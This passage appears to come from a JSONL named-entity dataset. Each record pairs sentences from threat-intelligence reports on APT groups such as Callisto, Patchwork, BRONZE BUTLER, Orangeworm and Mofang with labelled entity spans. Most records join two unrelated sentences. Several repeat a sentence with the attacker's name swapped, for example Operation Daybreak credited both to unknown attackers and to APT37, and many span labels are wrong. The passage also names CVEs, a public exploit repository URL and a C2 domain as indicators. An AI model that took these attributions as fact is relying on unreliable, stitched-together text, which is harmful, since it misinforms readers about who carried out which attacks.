Based on our analysis of Callisto Group 's usage of RCS Galileo , we believe the Callisto Group did not utilize the leaked RCS Galileo source code , but rather used the leaked readymade installers to set up their own installation of the RCS Galileo platform .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 57, "end": 76, "label": "Organization"}, {"start": 104, "end": 118, "label": "Organization"}, {"start": 265, "end": 275, "label": "Malware"}]} {"text": "On the same date that APT16 targeted Taiwanese media , suspected Chinese APT actors also targeted a Taiwanese government agency , sending a lure document that contained instructions for registration and subsequent listing of goods on a local Taiwanese auction website . In the known spear phishing attacks by the Callisto Group , they employed the \" Scout \" malware tool from the RCS Galileo platform .", "spans": [{"start": 22, "end": 27, "label": "Organization"}, {"start": 47, "end": 52, "label": "Organization"}, {"start": 73, "end": 83, "label": "Organization"}, {"start": 110, "end": 127, "label": "Organization"}, {"start": 313, "end": 327, "label": "Organization"}, {"start": 350, "end": 355, "label": "Malware"}, {"start": 384, "end": 391, "label": "Organization"}]} {"text": "APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails . We are confident the Callisto Group used this type of access to a target 's email account for the purposes of sending spear phishing to other targets .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 22, "end": 29, "label": "Organization"}, {"start": 34, "end": 44, "label": "Organization"}, {"start": 160, "end": 165, "label": "System"}]} {"text": "In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia . 
If a target of the spear phishing described in \" Phase 2 : malware deployment \" opened the email attachment and , crucially , clicked on the icon in the attachment , this would lead to the target 's computer becoming infected with the \" Scout \" malware tool from the RCS Galileo platform .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 114, "end": 125, "label": "Malware"}, {"start": 185, "end": 193, "label": "Organization"}, {"start": 451, "end": 456, "label": "Malware"}]} {"text": "In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe \" . Callisto Group and related infrastructure contain links to at least Russia , Ukraine , and China .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 114, "end": 125, "label": "Malware"}]} {"text": "APT33 sent spear phishing emails to employees whose jobs related to the aviation industry . they have been last known to employ malware in February 2016 .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 36, "end": 45, "label": "Organization"}, {"start": 72, "end": 89, "label": "Organization"}]} {"text": "It is possible that APT37 's distribution of KARAE malware via torrent websites could assist in creating and maintaining botnets for future distributed denial-of-service ( DDoS ) attacks , or for other activity such as financially motivated campaigns or disruptive operations . RCS Galileo platform .", "spans": [{"start": 20, "end": 25, "label": "Organization"}, {"start": 45, "end": 58, "label": "System"}]} {"text": "In May 2017 , APT37 used a bank liquidation letter as a spear phishing lure against a board member of a Middle Eastern financial company . 
The spear phishing emails used in the known attacks by the Callisto Group were so convincing that even skilled and alert users would likely have attempted to open the malicious attachment .", "spans": [{"start": 14, "end": 19, "label": "Organization"}, {"start": 86, "end": 98, "label": "Organization"}, {"start": 119, "end": 136, "label": "Organization"}, {"start": 158, "end": 164, "label": "System"}, {"start": 198, "end": 212, "label": "Organization"}]} {"text": "Operation Daybreak appears to have been launched by unknown attackers to infect high profile targets through spear-phishing e-mails . In October 2015 the Callisto Group targeted a handful of individuals with phishing emails that attempted to obtain the target 's webmail credentials .", "spans": [{"start": 60, "end": 69, "label": "Organization"}, {"start": 217, "end": 223, "label": "System"}]} {"text": "Operation Daybreak appears to have been launched by APT37 to infect high profile targets through spear-phishing e-mails . The Callisto Group has been active at least since late 2015 and continues to be so , including continuing to set up new phishing infrastructure every week .", "spans": [{"start": 52, "end": 57, "label": "Organization"}]} {"text": "BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . 
Called Greenbug , this group is believed to be instrumental in helping Shamoon steal user credentials of targets ahead of Shamoon 's destructive attacks .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 69, "end": 91, "label": "Vulnerability"}]} {"text": "The group has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . On Tuesday , Arbor Networks said that it has new leads on a credential stealing remote access Trojan ( RAT ) called Ismdoor , possibly used by Greenbug to steal credentials on Shamoon 's behalf .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 65, "end": 87, "label": "Vulnerability"}, {"start": 260, "end": 274, "label": "Organization"}, {"start": 341, "end": 347, "label": "Malware"}, {"start": 350, "end": 353, "label": "Malware"}, {"start": 363, "end": 370, "label": "Malware"}]} {"text": "BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . \" With our latest research we now see how Greenbug has shifted aACT from HTTP-based C2 communication with Ismdoor .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 96, "end": 110, "label": "System"}, {"start": 136, "end": 150, "label": "Vulnerability"}, {"start": 253, "end": 255, "label": "System"}, {"start": 275, "end": 282, "label": "Malware"}]} {"text": "The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . 
It's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 92, "end": 106, "label": "System"}, {"start": 132, "end": 146, "label": "Vulnerability"}, {"start": 191, "end": 217, "label": "Malware"}, {"start": 348, "end": 367, "label": "Organization"}]} {"text": "While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . t's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost .", "spans": [{"start": 39, "end": 50, "label": "Organization"}, {"start": 62, "end": 75, "label": "Organization"}, {"start": 142, "end": 155, "label": "Vulnerability"}, {"start": 267, "end": 293, "label": "Malware"}, {"start": 424, "end": 443, "label": "Organization"}]} {"text": "While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . 
By relying on a native PDF command to navigate to a new URL , Zirconium successfully circumvented Chrome 's anti-redirect protection .", "spans": [{"start": 39, "end": 50, "label": "Organization"}, {"start": 82, "end": 95, "label": "Organization"}, {"start": 162, "end": 175, "label": "Vulnerability"}]} {"text": "Symantec discovered the most recent wave of Tick attacks in July 2015 , when the group compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks . In the context of the Ismdoor RAT , the DNS attack technique is used primarily by Greenbug for stealing credentials .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 81, "end": 86, "label": "Organization"}, {"start": 218, "end": 229, "label": "Malware"}]} {"text": "Symantec discovered the most recent wave of Tick attacks in July 2015 , when BRONZE BUTLER compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks . To do this , it employs a number of specific commands via DNSMessenger .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 77, "end": 90, "label": "Organization"}, {"start": 258, "end": 270, "label": "Malware"}]} {"text": "However , even though the TTPs of the Cleaver team have some overlap to techniques used by Iranian Cyber Army ( botnets ) , Ashiyane ( SQL injection ) and Syrian Electronic Army ( phishing ) , we believe this is largely the work of a new team . 
Iranian Threat Agent Greenbug has been registering domains similar to those of Israeli High-Tech and Cyber Security Companies .", "spans": [{"start": 38, "end": 45, "label": "Organization"}, {"start": 99, "end": 109, "label": "Organization"}, {"start": 124, "end": 132, "label": "Organization"}, {"start": 155, "end": 177, "label": "Organization"}, {"start": 332, "end": 341, "label": "Organization"}, {"start": 346, "end": 370, "label": "Organization"}]} {"text": "In several cases , the Cobalt compromised company infrastructure and employee accounts in order to send phishing messages to partner companies in North and South America , Europe , CIS countries , and Central and Southeast Asia . By pivoting off the registration details and servers data of the two domains we discovered others registered by the threat agent .", "spans": [{"start": 23, "end": 29, "label": "Organization"}]} {"text": "To ensure remote access to the workstation of an employee at a target organization , the Cobalt group ( as in previous years ) uses Beacon , a Trojan available as part of commercial penetration testing software . Named Trochilus , this new RAT was part of Group 27 's malware portfolio that included six other malware strains , all served together or in different combinations , based on the data that needed to be stolen from each victim .", "spans": [{"start": 89, "end": 101, "label": "Organization"}, {"start": 132, "end": 138, "label": "System"}, {"start": 219, "end": 228, "label": "Malware"}, {"start": 240, "end": 243, "label": "Malware"}]} {"text": "In a recent spear-phishing campaign , the Cobalt Hacking Group used a remote code execution vulnerability in Microsoft Office software to connect to its command and control server via Cobalt Strike . 
According to the security experts , this collection of malware was discovered after their first initial report was published , meaning that Group 27 ignored the fact they were unmasked and continued to infect their targets regardless , through the same entry point , the Myanmar Union Election Commission ( UEC ) website .", "spans": [{"start": 42, "end": 62, "label": "Organization"}, {"start": 184, "end": 197, "label": "System"}, {"start": 471, "end": 504, "label": "Organization"}, {"start": 507, "end": 510, "label": "Organization"}]} {"text": "Gallmaker used lure documents attempt to exploit the Microsoft Office Dynamic Data Exchange ( DDE ) protocol in order to gain access to victim machines . Trochilus RAT activity was discovered during both months of October and November 2015 .", "spans": [{"start": 0, "end": 9, "label": "Organization"}]} {"text": "We believe that these industries have also been targeted as part of a larger supply-chain attack in order for Orangeworm to get access to their intended victims related to healthcare . From September 2016 through late November 2016 , a threat actor group used both the Trochilus RAT and a newly idenfied RAT we've named MoonWind to target organizations in Thailand , including a utility organization .", "spans": [{"start": 172, "end": 182, "label": "Organization"}, {"start": 269, "end": 282, "label": "Malware"}, {"start": 304, "end": 307, "label": "Malware"}, {"start": 320, "end": 328, "label": "Malware"}, {"start": 379, "end": 399, "label": "Organization"}]} {"text": "Orangeworm 's secondary targets include Manufacturing , Information Technology , Agriculture , and Logistics . 
We chose the name ' MoonWind ' based on debugging strings we saw within the samples , as well as the compiler used to generate the samples .", "spans": [{"start": 40, "end": 53, "label": "Organization"}, {"start": 56, "end": 78, "label": "Organization"}, {"start": 81, "end": 92, "label": "Organization"}, {"start": 99, "end": 108, "label": "Organization"}, {"start": 131, "end": 139, "label": "Malware"}]} {"text": "While these industries may appear to be unrelated , we found them to have multiple links to healthcare , such as large manufacturers that produce medical imaging devices sold directly into healthcare firms , IT organizations that provide support services to medical clinics , and logistical organizations that deliver healthcare products . The attackers compromised two legitimate Thai websites to host the malware , which is a tactic this group has used in the past .", "spans": [{"start": 92, "end": 102, "label": "Organization"}, {"start": 189, "end": 205, "label": "Organization"}, {"start": 208, "end": 224, "label": "Organization"}, {"start": 258, "end": 273, "label": "Organization"}, {"start": 280, "end": 304, "label": "Organization"}, {"start": 318, "end": 328, "label": "Organization"}, {"start": 370, "end": 394, "label": "Malware"}]} {"text": "Once Orangeworm has infiltrated a victim 's network , they deploy Trojan.Kwampirs , a backdoor Trojan that provides the attackers with remote access to the compromised computer . 
Both the Trochilus and MoonWind RATs were hosted on the same compromised sites and used to target the same organization at the same time .", "spans": [{"start": 86, "end": 101, "label": "System"}, {"start": 120, "end": 129, "label": "Organization"}, {"start": 188, "end": 197, "label": "Malware"}, {"start": 202, "end": 215, "label": "Malware"}]} {"text": "Patchwork targets were chosen worldwide with a focus on personnel working on military and political assignments , and specifically those working on issues relating to Southeast Asia and the South China Sea . The attackers used different command and control servers ( C2s ) for each malware family , a tactic we believe was meant to thwart attempts to tie the attacks together using infrastructure alone .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 56, "end": 65, "label": "Organization"}, {"start": 77, "end": 111, "label": "Organization"}, {"start": 237, "end": 264, "label": "Malware"}]} {"text": "Kwampirs uses a fairly aggressive means to propagate itself once inside a victim 's network by copying itself over network shares . Further research led us to additional MoonWind samples using the same C2 ( dns.webswindows.com ) but hosted on a different compromised but legitimate website .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 170, "end": 186, "label": "Malware"}, {"start": 202, "end": 204, "label": "System"}, {"start": 271, "end": 289, "label": "Malware"}]} {"text": "In mid-August , the OilRig threat group sent what appeared to be a highly targeted phishing email to a high-ranking office in a Middle Eastern nation . 
The attacks in that case took place in late September to early October 2016 and the attackers stored the MoonWind samples as RAR files , while in the November attacks the RATs were stored as executables .", "spans": [{"start": 20, "end": 26, "label": "Organization"}, {"start": 27, "end": 39, "label": "Organization"}, {"start": 257, "end": 273, "label": "Malware"}, {"start": 277, "end": 286, "label": "Malware"}, {"start": 323, "end": 327, "label": "Malware"}]} {"text": "Patchwork 's attack was detected as part of a spear phishing against a government organization in Europe in late May 2016 . We were not able to find additional tools , but the attackers again compromised a legitimate Thai website to host their malware , in this case the student portal for a Thai University .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 71, "end": 94, "label": "Organization"}]} {"text": "The attack was detected as part of a spear phishing against a government organization in Europe in late May 2016 . Trochilus was first reported by Arbor Networks in their Seven Pointed Dagger report tying its use to other targeted Southeast Asia activity .", "spans": [{"start": 62, "end": 85, "label": "Organization"}, {"start": 115, "end": 124, "label": "Malware"}, {"start": 147, "end": 161, "label": "Organization"}]} {"text": "The Patchwork attack group has been targeting more than just government-associated organizations . The activity dates to at least 2013 and has ties to multiple reports by other researchers .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 14, "end": 26, "label": "Organization"}, {"start": 61, "end": 96, "label": "Organization"}]} {"text": "Symantec has been actively monitoring Patchwork , also known as Dropping Elephant , which uses Chinese-themed content as bait to compromise its targets ' networks . 
It is highly likely MoonWind is yet another new tool being used by the group or groups responsible for that activity , indicating they are not only still active but continuing to evolve their playbook .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 38, "end": 47, "label": "Organization"}, {"start": 64, "end": 81, "label": "Organization"}, {"start": 185, "end": 193, "label": "Malware"}]} {"text": "Two security companies , Cymmetria and Kaspersky , each recently released reports on the campaign , most of which are in line with our observations . The samples provided were alleged to be targeting Tibetan and Chinese Pro-Democracy Activists .", "spans": [{"start": 39, "end": 48, "label": "Organization"}]} {"text": "Symantec Security Response has been actively monitoring Patchwork , also known as Dropping Elephant , which uses Chinese-themed content as bait to compromise its targets ' networks . On June 7 , 2013 , Rapid7 released an analysis of malware dubbed ' KeyBoy ' , also exploiting unknown vulnerabilities in Microsoft Office , similarly patched by MS12-060 , but allegedly targeting interests in Vietnam and India .", "spans": [{"start": 0, "end": 26, "label": "Organization"}, {"start": 56, "end": 65, "label": "Organization"}, {"start": 82, "end": 99, "label": "Organization"}, {"start": 202, "end": 208, "label": "Organization"}, {"start": 250, "end": 256, "label": "Malware"}, {"start": 304, "end": 313, "label": "Organization"}, {"start": 344, "end": 352, "label": "Malware"}]} {"text": "While Orangeworm has impacted only a small set of victims in 2016 and 2017 according to Symantec , we have seen infections in multiple countries due to the nature of the victims operating large international corporations . 
As we have seen in some previous targeted malware attacks , the attackers in this incident are taking advantage of services like .", "spans": [{"start": 88, "end": 96, "label": "Organization"}]} {"text": "Although approximately half of the attacks focus on the US , other targeted regions include China , Japan , Southeast Asia , and the United Kingdom . com to establish free subdomains in their infrastructure .", "spans": []} {"text": "While Orangeworm has impacted only a small set of victims in 2016 and 2017 according to Symantec telemetry , we have seen infections in multiple countries due to the nature of the victims operating large international corporations . Blending in with legitimate traffic is a common tactic used by attackers to help fly under the radar .", "spans": [{"start": 88, "end": 96, "label": "Organization"}, {"start": 250, "end": 268, "label": "Malware"}]} {"text": "Our first observation of an attempted attack related to this campaign dates back to November 2015 , although Symantec telemetry data indicates that the campaign may have already existed in early 2015 or perhaps even earlier . Subdomains at phmail.us have been linked to malicious activity dating back as far as December 2011 .", "spans": [{"start": 109, "end": 117, "label": "Organization"}]} {"text": "Should a user enable this content , Gallmaker is then able to use the DDE protocol to remotely execute commands in memory on the victima 's system . Based on the patterns of subdomain registration over time in DNS , TRAC believes this is an example where the attackers registered their own second-level domain .", "spans": [{"start": 36, "end": 45, "label": "Organization"}, {"start": 70, "end": 82, "label": "System"}, {"start": 210, "end": 213, "label": "Indicator"}, {"start": 216, "end": 220, "label": "Organization"}]} {"text": "While both back door Trojans wait for commands from the threat actor , they can search for files and upload them to the specified server once activated . 
In this blog post we'll analyze two specific incidents apparently targeting victims in Vietnam and in India and we'll describe the capabilities of the custom backdoor being used that for convenience ( and to our knowledge , for a lack of an existing name ) we call KeyBoy , due to a string present in one of the samples .", "spans": [{"start": 56, "end": 68, "label": "Organization"}, {"start": 312, "end": 320, "label": "Malware"}, {"start": 419, "end": 425, "label": "Malware"}]} {"text": "Patchwork ( also known as Dropping Elephant ) is a cyberespionage group whose targets included diplomatic and government agencies as well as businesses . We encountered the first document exploit called \" THAM luan - GD - NCKH2.doc \" a few days ago , which appears to be leveraging some vulnerabilities patched with MS12-060 .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 26, "end": 43, "label": "Organization"}, {"start": 51, "end": 71, "label": "Organization"}, {"start": 95, "end": 105, "label": "Organization"}, {"start": 110, "end": 129, "label": "Organization"}, {"start": 141, "end": 151, "label": "Organization"}, {"start": 188, "end": 195, "label": "Vulnerability"}, {"start": 205, "end": 221, "label": "Indicator"}, {"start": 222, "end": 231, "label": "Indicator"}, {"start": 316, "end": 324, "label": "Malware"}]} {"text": "Patchwork is known for rehashing off-therack tools and malware for its own campaigns . This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 23, "end": 50, "label": "System"}, {"start": 55, "end": 62, "label": "System"}]} {"text": "They also included Dynamic Data Exchange ( DDE ) and Windows Script Component ( SCT ) abuse to their tactics , as well as started exploiting recently reported vulnerabilities . 
For the sake of this analysis we'll take the Vietnamese backdoor as an example ; the one found in the Indian attack operates in the exact same way .", "spans": [{"start": 222, "end": 241, "label": "Malware"}]} {"text": "These socially engineered emails contain web links of weaponized documents containing exploits or macros . In the second set they are making use of a dynamic DNS service by .", "spans": [{"start": 150, "end": 169, "label": "Malware"}]} {"text": "It contains an additional meta tag at the end of the web page source code , \" refreshing \" ( redirecting ) the site visitor to the weaponized document . com .", "spans": []} {"text": "It 's probable that Patchwork uses this package to facilitate server installation when using a Windows environment . The Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information .", "spans": [{"start": 20, "end": 29, "label": "Organization"}, {"start": 121, "end": 138, "label": "Organization"}, {"start": 208, "end": 215, "label": "Malware"}]} {"text": "In March and April 2018 , Volexity identified multiple spear phishing campaigns attributed to Patchwork , an Indian APT group also known as Dropping Elephant . he Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information .", "spans": [{"start": 26, "end": 34, "label": "Organization"}, {"start": 94, "end": 103, "label": "Organization"}, {"start": 116, "end": 125, "label": "Organization"}, {"start": 140, "end": 157, "label": "Organization"}, {"start": 163, "end": 180, "label": "Organization"}, {"start": 250, "end": 257, "label": "Malware"}]} {"text": "This increase in threat activity was consistent with other observations documented over the last few months in blogs by 360 Threat Intelligence Center analyzing attacks on Chinese organizations and Trend Micro noting targets in South Asia . 
They are often targeted simultaneously with other ethnic minorities and religious groups in China .", "spans": [{"start": 120, "end": 150, "label": "Organization"}, {"start": 198, "end": 209, "label": "Organization"}, {"start": 291, "end": 308, "label": "Organization"}, {"start": 313, "end": 329, "label": "Organization"}]} {"text": "Volexity has also found that , in addition to sending malware lures , the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 74, "end": 97, "label": "Organization"}, {"start": 257, "end": 273, "label": "Indicator"}, {"start": 293, "end": 331, "label": "Organization"}, {"start": 334, "end": 338, "label": "Organization"}, {"start": 360, "end": 370, "label": "Organization"}, {"start": 375, "end": 388, "label": "Organization"}]} {"text": "The newsletter includes a link to the attacker 's website , which has content focusing on topics related to China to draw the target 's interest . More recently in 2016 , Arbor Networks reported on connected malware operations continuing to target these same groups , which the Communist Party of China perceives as a threat to its power .", "spans": [{"start": 38, "end": 46, "label": "Organization"}, {"start": 171, "end": 185, "label": "Organization"}]} {"text": "Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . 
There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements \u2013 developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information .", "spans": [{"start": 54, "end": 64, "label": "System"}, {"start": 85, "end": 98, "label": "Malware"}, {"start": 123, "end": 136, "label": "Vulnerability"}, {"start": 139, "end": 148, "label": "Vulnerability"}, {"start": 149, "end": 156, "label": "Vulnerability"}, {"start": 174, "end": 186, "label": "Indicator"}]} {"text": "The threat actors appear to have leveraged publicly available exploit code that can be found on Github at the URL : https://github.com/rxwx/CVE-2017-8570 . For example , we have observed frequent reuse of older ( patched ) exploits in malware operations against the Tibetan community .", "spans": [{"start": 4, "end": 17, "label": "Organization"}, {"start": 266, "end": 283, "label": "Organization"}]} {"text": "Dropping Elephant ( also known as \" Chinastrats \" and \" Patchwork \" ) is a relatively new threat actor that is targeting a variety of high profile diplomatic and economic targets using a custom set of attack tools . 
These operations involved highly targeted email lures with repurposed content and attachments that contained an updated version of KeyBoy .", "spans": [{"start": 0, "end": 17, "label": "Organization"}, {"start": 36, "end": 47, "label": "Organization"}, {"start": 56, "end": 65, "label": "Organization"}, {"start": 90, "end": 102, "label": "Organization"}, {"start": 147, "end": 157, "label": "Organization"}, {"start": 162, "end": 170, "label": "Organization"}, {"start": 258, "end": 269, "label": "Malware"}, {"start": 347, "end": 353, "label": "Malware"}]} {"text": "At this point , the attackers know the user has opened the document and send another spear-phishing email , this time containing an MS Word document with an embedded executable . In August and October 2016 we observed a malware operation targeting members of the Tibetan Parliament ( the highest legislative organ of the Tibetan government in exile , formally known as Central Tibetan Administration ) .", "spans": [{"start": 20, "end": 29, "label": "Organization"}, {"start": 132, "end": 148, "label": "Malware"}, {"start": 263, "end": 281, "label": "Organization"}, {"start": 321, "end": 339, "label": "Organization"}, {"start": 369, "end": 399, "label": "Organization"}]} {"text": "The Word document usually exploits CVE-2012-0158 . The Arbor report describes the ongoing use of these four vulnerabilities in a series of espionage campaigns against not only Tibetan groups , but also others related to Hong Kong , Taiwan , and Uyghur interests .", "spans": [{"start": 4, "end": 17, "label": "Malware"}, {"start": 35, "end": 48, "label": "Vulnerability"}, {"start": 55, "end": 60, "label": "Organization"}, {"start": 176, "end": 190, "label": "Organization"}]} {"text": "Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 . 
The malware samples deployed in both of these operations are updated versions of the KeyBoy backdoor first discussed in 2013 by Rapid7 .", "spans": [{"start": 14, "end": 23, "label": "Organization"}, {"start": 32, "end": 54, "label": "Malware"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 181, "end": 196, "label": "Malware"}, {"start": 224, "end": 230, "label": "Organization"}]} {"text": "Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 . This behavioural tactic was previously mentioned in relation to KeyBoy in a 2013 blog post by Cisco .", "spans": [{"start": 10, "end": 19, "label": "Organization"}, {"start": 28, "end": 50, "label": "Malware"}, {"start": 76, "end": 89, "label": "Vulnerability"}, {"start": 156, "end": 162, "label": "Malware"}, {"start": 186, "end": 191, "label": "Organization"}]} {"text": "From the attacks observed by Volexity , what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks . These versions of KeyBoy differed from the one first described by Rapid7 in several ways , many of which will be described in the sections to follow .", "spans": [{"start": 29, "end": 37, "label": "Organization"}, {"start": 69, "end": 78, "label": "Organization"}, {"start": 188, "end": 194, "label": "Malware"}, {"start": 236, "end": 242, "label": "Organization"}]} {"text": "Once started , it downloads additional malware from the C2 and also uploads some basic system information , stealing , among other things , the user 's Google Chrome credentials . These samples were contained in exploit documents containing distinct lure content , one having a Tibetan nexus , the other an Indian nexus .", "spans": [{"start": 212, "end": 219, "label": "Vulnerability"}]} {"text": "It repeatedly attempts to iterate through directories and to collect files with the following extensions : doc , docx , ppt , pptx , pps , ppsx , xls , xlsx , and pdf . 
We believe the 2013 , 2015 , and 2016 KeyBoy samples provide evidence of a development effort focused on changing components that would be used by researchers to develop detection signatures .", "spans": [{"start": 107, "end": 110, "label": "System"}, {"start": 113, "end": 117, "label": "System"}, {"start": 120, "end": 123, "label": "System"}, {"start": 126, "end": 130, "label": "System"}, {"start": 133, "end": 136, "label": "System"}, {"start": 139, "end": 143, "label": "System"}, {"start": 146, "end": 149, "label": "System"}, {"start": 152, "end": 156, "label": "System"}, {"start": 163, "end": 166, "label": "System"}, {"start": 207, "end": 221, "label": "Malware"}]} {"text": "In this case , a small group reusing exploit code , some powershell-based malware and mostly social engineering has been able to steal sensitive documents and data from victims since at least November 2015 . In another modification , first observed in the most recent October 11 Parliamentarian operation ( version agewkassif ) , the developer (s ) of KeyBoy began using a string obfuscation routine in order to hide many of the critical values referenced within the malware .", "spans": [{"start": 23, "end": 28, "label": "Organization"}, {"start": 57, "end": 81, "label": "System"}, {"start": 93, "end": 111, "label": "Organization"}, {"start": 352, "end": 358, "label": "Malware"}, {"start": 373, "end": 399, "label": "Malware"}]} {"text": "In the past few months , Unit 42 has observed the Patchwork group , alternatively known as Dropping Elephant and Monsoon , conducting campaigns against targets located in the Indian subcontinent . 
Trend Micro specifically noted that the 2013 versions of KeyBoy used the same algorithm for encoding their configuration files as was observed in the Operation Tropic Trooper malware .", "spans": [{"start": 25, "end": 32, "label": "Organization"}, {"start": 50, "end": 65, "label": "Organization"}, {"start": 91, "end": 108, "label": "Organization"}, {"start": 113, "end": 120, "label": "Organization"}, {"start": 197, "end": 208, "label": "Organization"}, {"start": 254, "end": 260, "label": "Malware"}]} {"text": "The malicious documents seen in recent activity refer to a number of topics , including recent military promotions within the Pakistan Army , information related to the Pakistan Atomic Energy Commission , as well as Pakistan 's Ministry of the Interior . This sample was also found to be deployed using the CVE-2012-0158 vulnerability .", "spans": [{"start": 4, "end": 23, "label": "Malware"}, {"start": 126, "end": 139, "label": "Organization"}, {"start": 307, "end": 320, "label": "Vulnerability"}]} {"text": "The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . The operation against the Tibetan Parliamentarians illustrates the continued use of malicious attachments in the form of documents bearing exploits .", "spans": [{"start": 29, "end": 36, "label": "Organization"}, {"start": 109, "end": 118, "label": "Malware"}, {"start": 133, "end": 146, "label": "Vulnerability"}, {"start": 151, "end": 164, "label": "Vulnerability"}, {"start": 209, "end": 233, "label": "Organization"}, {"start": 267, "end": 288, "label": "Indicator"}, {"start": 304, "end": 330, "label": "Malware"}]} {"text": "Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability , however in late January 2018 when , paradoxically , newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability . 
Chances are about even , though , that Mofang is a relevant threat actor to any organization that invests in Myanmar or is otherwise politically involved .", "spans": [{"start": 24, "end": 33, "label": "Organization"}, {"start": 49, "end": 62, "label": "Vulnerability"}, {"start": 196, "end": 209, "label": "Vulnerability"}, {"start": 265, "end": 271, "label": "Organization"}, {"start": 359, "end": 370, "label": "Organization"}]} {"text": "The Patchwork group continues to plague victims located within the Indian subcontinent . In addition to the campaign in Myanmar , Mofang has been observed to attack targets across multiple sectors ( government , military , critical infrastructure and the automotive and weapon industries ) in multiple countries .", "spans": [{"start": 4, "end": 19, "label": "Organization"}, {"start": 130, "end": 136, "label": "Organization"}, {"start": 199, "end": 209, "label": "Organization"}, {"start": 212, "end": 220, "label": "Organization"}, {"start": 223, "end": 246, "label": "Organization"}, {"start": 255, "end": 265, "label": "Organization"}, {"start": 270, "end": 287, "label": "Organization"}]} {"text": "The overarching campaign appears to target both Chinese nationals within different industries and government agencies in Southern Asia . This threat report gives insight into some of the information that Fox-IT has about a threat actor that it follows , called Mofang .", "spans": [{"start": 98, "end": 117, "label": "Organization"}, {"start": 204, "end": 210, "label": "Organization"}, {"start": 261, "end": 267, "label": "Organization"}]} {"text": "It appears to have started in December 2015 and is still ongoing as of July 2016 . The name Mofang is based on the Mandarin verb , which means to imitate .", "spans": [{"start": 92, "end": 98, "label": "Organization"}]} {"text": "The use of weaponized legitimate documents is a longstanding operational standard of Patchwork . 
It is highly likely that the Mofang group is a group that operates out of China and is probably government-affiliated .", "spans": [{"start": 11, "end": 42, "label": "System"}, {"start": 85, "end": 94, "label": "Organization"}, {"start": 126, "end": 138, "label": "Organization"}]} {"text": "It is dropped by at least one of the weaponised documents17 used in the MONSOON campaign where it is embedded inside another executable . Chapter 7 explains the working of Mofang 's preferred tools : ShimRat and SimRatReporter .", "spans": [{"start": 48, "end": 59, "label": "System"}, {"start": 200, "end": 207, "label": "Malware"}, {"start": 212, "end": 226, "label": "Malware"}]} {"text": "The majority of the code for TINYTYPHON is taken from the MyDoom worm and has been repurposed to find and exfiltrate documents . The Mofang group has been active in relation to the Kyaukphyu sez .", "spans": [{"start": 58, "end": 69, "label": "System"}, {"start": 133, "end": 145, "label": "Organization"}]} {"text": "The targeting of Chinese nationals may also be related to this campaign , but equally may be part of a separate campaign by the adversary or even as part of them selling Surveillance-As-A-Service in a similar manner previously seen with the HANGOVER group . KeyBoy provides basic backdoor functionality , allowing the operators to 